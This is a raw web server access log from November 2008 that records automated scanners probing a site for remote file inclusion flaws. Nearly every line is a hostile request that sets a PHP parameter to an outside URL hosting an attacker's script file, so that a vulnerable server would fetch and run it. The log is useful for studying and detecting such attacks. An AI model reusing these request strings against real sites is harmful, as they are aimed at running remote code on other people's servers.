66.55.139.190 - - [16/Nov/2008:18:54:26 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:54:27 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:54:27 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:56:36 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:56:36 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:56:36 -0800] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:56:40 -0800] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:57:00 -0800] "GET /logs/access_080714.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:58:05 -0800] "GET /logs/access.log%20/joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:59:29 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
222.122.52.79 - - [16/Nov/2008:19:00:14 -0800] "GET /logs/access_080428.log//newspublish/include.php?path%5Bdocroot%5D=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.75.35.118 - - [16/Nov/2008:19:01:40 -0800] "GET /logs/access_080421.log//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [16/Nov/2008:19:01:40 -0800] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [16/Nov/2008:19:01:40 -0800] "GET /logs//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 200 5090 "-" "libwww-perl/5.805" "www.mathstamps.com"
220.232.237.122 - - [16/Nov/2008:19:01:53 -0800] "GET /logs/access_080714.log/index.php?stranica=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
220.232.237.122 - - [16/Nov/2008:19:01:53 -0800] "GET /index.php?stranica=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
220.232.237.122 - - [16/Nov/2008:19:01:53 -0800] "GET /logs/index.php?stranica=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
220.232.237.122 - - [16/Nov/2008:19:01:54 -0800] "GET /logs/access_080901.log/index.php?stranica=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:19:02:26 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:19:02:26 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:19:02:26 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:19:02:46 -0800] "GET /logs/access_080414.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:19:02:46 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:19:02:46 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:19:03:21 -0800] "GET /logs/access.log//components/com_extended_registration/registratio